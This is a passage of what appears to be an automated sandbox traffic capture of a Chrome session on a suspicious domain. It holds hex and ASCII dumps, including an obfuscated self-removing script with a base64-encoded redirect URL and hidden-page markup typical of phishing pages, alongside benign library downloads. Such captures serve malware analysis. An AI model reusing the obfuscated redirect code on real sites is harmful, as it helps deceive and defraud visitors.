                                                                              Data Ascii: nt.currentScript;aRKtdtLNAx.parentNode.removeChild(aRKtdtLNAx);}/* Success usually comes to those who are too busy to be looking for it. */if(atob("aHR0cHM6Ly9maFQubGlkb2Npb3UuY29tL2xyanFNLw==") !== "nomatch"){const uUbDbAhatE = window.locatio
                                                                              2024-12-11 14:19:38 UTC1369INData Raw: 5a 58 52 68 49 47 35 68 62 57 55 39 49 6e 4a 76 59 6d 39 30 63 79 49 67 59 32 39 75 64 47 56 75 64 44 30 69 62 6d 39 70 62 6d 52 6c 65 43 77 67 62 6d 39 6d 62 32 78 73 62 33 63 69 50 67 30 4b 49 43 41 67 49 44 78 74 5a 58 52 68 49 47 35 68 62 57 55 39 49 6e 5a 70 5a 58 64 77 62 33 4a 30 49 69 42 6a 62 32 35 30 5a 57 35 30 50 53 4a 33 61 57 52 30 61 44 31 6b 5a 58 5a 70 59 32 55 74 64 32 6c 6b 64 47 67 73 49 47 6c 75 61 58 52 70 59 57 77 74 63 32 4e 68 62 47 55 39 4d 53 34 77 49 6a 34 4e 43 69 41 67 49 43 41 38 64 47 6c 30 62 47 55 2b 4a 69 4d 34 4d 6a 41 7a 4f 7a 77 76 64 47 6c 30 62 47 55 2b 44 51 6f 67 49 43 41 67 50 48 4e 30 65 57 78 6c 50 67 30 4b 59 6d 39 6b 65 53 42 37 44 51 6f 67 49 47 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74 59 32 39 73 62 33 49
                                                                              Data Ascii: ZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I
                                                                              2024-12-11 14:19:38 UTC1369INData Raw: 6e 52 6c 62 6e 51 36 59 32 56 75 64 47 56 79 49 57 6c 74 63 47 39 79 64 47 46 75 64 44 74 39 44 51 6f 6a 55 58 56 46 5a 45 4a 72 5a 33 64 47 59 79 35 74 64 43 30 31 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 33 4a 6c 62 53 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 66 51 30 4b 49 31 46 31 52 57 52 43 61 32 64 33 52 6d 4d 67 4c 6d 31 30 4c 54 51 67 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 49 44 46 79 5a 57 30 68 61 57 31 77 62 33 4a 30 59 57 35 30 4f 33 30 4e 43 69 4e 52 64 55 56 6b 51 6d 74 6e 64 30 5a 6a 49 43 4e 5a 57 58 5a 46 52 46 56 48 61 6e 70 6c 49 48 74 6a 62 32 78 76 63 6a 6f 67 49 7a 5a 6a 4e 7a 55 33 5a 44 74 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 4d 54 52 77 65 44 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 69 41 75 4e 58 4a 6c
                                                                              Data Ascii: nRlbnQ6Y2VudGVyIWltcG9ydGFudDt9DQojUXVFZEJrZ3dGYy5tdC01e21hcmdpbi10b3A6M3JlbSFpbXBvcnRhbnQ7fQ0KI1F1RWRCa2d3RmMgLm10LTQge21hcmdpbi10b3A6IDFyZW0haW1wb3J0YW50O30NCiNRdUVkQmtnd0ZjICNZWXZFRFVHanplIHtjb2xvcjogIzZjNzU3ZDtmb250LXNpemU6MTRweDttYXJnaW4tdG9wOiAuNXJl


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.1649715104.17.25.144436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:39 UTC650OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                              Host: cdnjs.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://fht.lidociou.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:19:40 UTC964INHTTP/1.1 200 OK
                                                                              Date: Wed, 11 Dec 2024 14:19:40 GMT
                                                                              Content-Type: application/javascript; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Access-Control-Allow-Origin: *
                                                                              Cache-Control: public, max-age=30672000
                                                                              ETag: W/"61182885-40eb"
                                                                              Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                              cf-cdnjs-via: cfworker/kv
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              Timing-Allow-Origin: *
                                                                              X-Content-Type-Options: nosniff
                                                                              CF-Cache-Status: HIT
                                                                              Age: 425535
                                                                              Expires: Mon, 01 Dec 2025 14:19:40 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d7modMZ%2B1QwYzT92hfhjdrx3XGGBunxy12frgcIJl0u%2FbEIraiYtAKFSVIa%2FIIWIk%2B78KyZcJI76tu2xIbWYpIGgGRWVDuUlbevEZaHQ0%2B5jbBB3%2BonCtBswZD5lQs1tvrPDlVnL"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                              Strict-Transport-Security: max-age=15780000
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f061c67cf98c46b-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-12-11 14:19:40 UTC405INData Raw: 37 62 65 64 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                              Data Ascii: 7bed!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                              2024-12-11 14:19:40 UTC1369INData Raw: 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63
                                                                              Data Ascii: typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Objec
                                                                              2024-12-11 14:19:40 UTC1369INData Raw: 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d
                                                                              Data Ascii: lone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.random
                                                                              2024-12-11 14:19:40 UTC1369INData Raw: 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d
                                                                              Data Ascii: "==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=
                                                                              2024-12-11 14:19:40 UTC1369INData Raw: 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b
                                                                              Data Ascii: {for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[
                                                                              2024-12-11 14:19:40 UTC1369INData Raw: 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31
                                                                              Data Ascii: ?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<1
                                                                              2024-12-11 14:19:40 UTC1369INData Raw: 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67
                                                                              Data Ascii: buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={string
                                                                              2024-12-11 14:19:40 UTC1369INData Raw: 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b
                                                                              Data Ascii: o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJK
                                                                              2024-12-11 14:19:40 UTC1369INData Raw: 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20
                                                                              Data Ascii: .abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var
                                                                              2024-12-11 14:19:40 UTC1369INData Raw: 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77
                                                                              Data Ascii: A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.1649714104.18.94.414436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:39 UTC648OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://fht.lidociou.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:19:40 UTC386INHTTP/1.1 302 Found
                                                                              Date: Wed, 11 Dec 2024 14:19:40 GMT
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                              cross-origin-resource-policy: cross-origin
                                                                              location: /turnstile/v0/g/f9063374b04d/api.js
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f061c67ca6b80d3-EWR
                                                                              alt-svc: h3=":443"; ma=86400


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.1649713151.101.2.1374436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:39 UTC622OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                              Host: code.jquery.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://fht.lidociou.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:19:40 UTC613INHTTP/1.1 200 OK
                                                                              Connection: close
                                                                              Content-Length: 89501
                                                                              Server: nginx
                                                                              Content-Type: application/javascript; charset=utf-8
                                                                              Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                              ETag: "28feccc0-15d9d"
                                                                              Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                              Access-Control-Allow-Origin: *
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                              Accept-Ranges: bytes
                                                                              Date: Wed, 11 Dec 2024 14:19:40 GMT
                                                                              Age: 2448312
                                                                              X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740052-EWR
                                                                              X-Cache: HIT, HIT
                                                                              X-Cache-Hits: 2774, 8
                                                                              X-Timer: S1733926780.123008,VS0,VE0
                                                                              Vary: Accept-Encoding
                                                                              2024-12-11 14:19:40 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                              Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                              2024-12-11 14:19:40 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                              Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
